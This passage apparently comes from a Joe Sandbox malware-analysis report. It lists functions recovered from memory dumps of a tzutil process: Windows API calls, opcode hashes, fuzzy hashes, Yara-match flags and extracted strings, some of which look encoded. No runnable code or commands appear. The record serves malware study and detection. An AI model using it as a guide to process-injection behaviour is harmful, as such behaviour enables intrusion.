                                                          • Instruction Fuzzy Hash: 7E21EE7B7402051FC315CA28D882BF9B728EB92325F11029AF915CF381EB315E16C7E4
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 001D4A02
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                          • Instruction ID: 889d9a0ab1ffaa21c6dfce5d7f7f9a2c954bd5e06f412cae66e89dbea0c40596
                                                          • Opcode Fuzzy Hash: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                          • Instruction Fuzzy Hash: 8121DF3B7401568FCB11CE28C841AFAFF64EB96718B6542EBD465CB342D332D8068794
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 001D4A02
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                          • Instruction ID: d26d4b22cfcc9d0d66c73720e4140068a9c7b3e5cb8ca3c66e5d1189ffd6347e
                                                          • Opcode Fuzzy Hash: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                          • Instruction Fuzzy Hash: 5B011EB5D4024DBBDF10DAA5DC42F9EB7B89B54308F004195E91897241F771EB15CB91
                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,001D8724,00000010,?,?,?,00000044,?,00000010,001D8724,?,?,?), ref: 001E9BB3
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                          • Instruction ID: ebc8236622a62ed9bde65445373de4a860f2627506e89e749623eae15591691c
                                                          • Opcode Fuzzy Hash: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                          • Instruction Fuzzy Hash: 7101CCB2215508BBCB08DE99DC91EEB77ADEF8D754F518208FA09E3241D630F8518BA4
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 001C9F62
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                          • Instruction ID: 0cc3d6666dc8f1b4ff9b324270b55e837453e69c03c1c1a892e94263ffcbebb4
                                                          • Opcode Fuzzy Hash: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                          • Instruction Fuzzy Hash: 97F06D3338070436E22061EA9C03FDBB79C9FA5B75F14002AF60DEA1C1DAA6F80186E4
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 001C9F62
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                          • Instruction ID: 3180b09655b8e92db1410c335e350e359376e609d6f2a8ae0dd82e0aedc9fdb5
                                                          • Opcode Fuzzy Hash: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                          • Instruction Fuzzy Hash: A4F0E5322407403AE33062A98C03FDFAB9C9FA5B60F24011DF609AB1C1C6A6F40187E4
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(001D1E59,?,001E5F17,001D1E59,?,001E5F17,?,001D1E59,001E59BF,00001000,?,00000000), ref: 001E9AC9
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                          • Instruction ID: 2e917bcfcec892c1a0d85061d348d08915c2b9878553cb57530b63b82b623be2
                                                          • Opcode Fuzzy Hash: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                          • Instruction Fuzzy Hash: FEE09A72200208BBC614EF59DC41F9B73ACEFC9710F004408FA08A7242C731B9108BF8
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,001D4211,000000F4), ref: 001E9B09
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                          • Instruction ID: fd970dd4602becf114294577f4aaddbc28f466db02cfb96e375299208687c143
                                                          • Opcode Fuzzy Hash: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                          • Instruction Fuzzy Hash: 16E06572200204BBC624EE59DC42FAB73ACEF8AB14F004418F908A7242C730F8208AB4
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 001D878A
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                          • Instruction ID: 28a5bc5baf953492c13793f55d7188a9ee63c94d4491571c52bdb920a000edea
                                                          • Opcode Fuzzy Hash: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                          • Instruction Fuzzy Hash: 73E086752406043BFF1476A89C46F66335C4B88734F284A51FA1CDB3C2DB78F9018654
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,?,001D2150,001E82FF,?,001D211B), ref: 001D8591
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                          • Instruction ID: 94abdee79557053e7da16bb47df813be7683ee627647b00a18d2578deb92748d
                                                          • Opcode Fuzzy Hash: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                          • Instruction Fuzzy Hash: CDD05E723803043BFA00A6E59C43F56328D5F15B65F050064FA0CEA2C2DA65F6008965
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b89c2e261aa7d033cbdfd7c2ebf1e4477302e0d7d3fdc1f149d4c91bd5175f04
                                                          • Instruction ID: d5b498dc81e4d40484b50f5d463cf13911da13ebfe1fe9b4072578c875716f72
                                                          • Opcode Fuzzy Hash: b89c2e261aa7d033cbdfd7c2ebf1e4477302e0d7d3fdc1f149d4c91bd5175f04
                                                          • Instruction Fuzzy Hash: 85B09B71D419C5C5EA12E7604A087177A006BD0702F25C165D2030641E4739C5D1E176
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615155521.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2ae0000_tzutil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                          • Instruction ID: a92bb44dda126ff75b00c9c4196a3b5ba890e89d129039804275220059e317b7
                                                          • Opcode Fuzzy Hash: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                          • Instruction Fuzzy Hash: 5B41E270658F0D4FDB68AF6890816B6B3E2FB48310F50462DD98BC3252EFB4E8478685
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615155521.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2ae0000_tzutil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                          • API String ID: 0-3558027158
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          Strings
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02CE4655
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 02CE4787
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02CE4742
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02CE46FC
                                                          • Execute=1, xrefs: 02CE4713
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02CE4725
                                                          • ExecuteOptions, xrefs: 02CE46A0
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$[$]:%u
                                                          • API String ID: 48624451-2819853543
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615155521.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2ae0000_tzutil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: XQcQ$X]_Q$gURU$uZPF$vA]X$w\F[$y[N]
                                                          • API String ID: 0-1416458366
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 02CE031E
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02CE02E7
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02CE02BD
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          Strings
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02CE7B7F
                                                          • RTL: Re-Waiting, xrefs: 02CE7BAC
                                                          • RTL: Resource at %p, xrefs: 02CE7B8E
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 0-871070163
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02CE728C
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 02CE72C1
                                                          • RTL: Resource at %p, xrefs: 02CE72A3
                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02CE7294
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-605551621
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-
                                                          • API String ID: 1302938615-2137968064
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          APIs
                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 02CFCFBD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: CallFilterFunc@8
                                                          • String ID: @$@4_w@4_w
                                                          • API String ID: 4062629308-713214301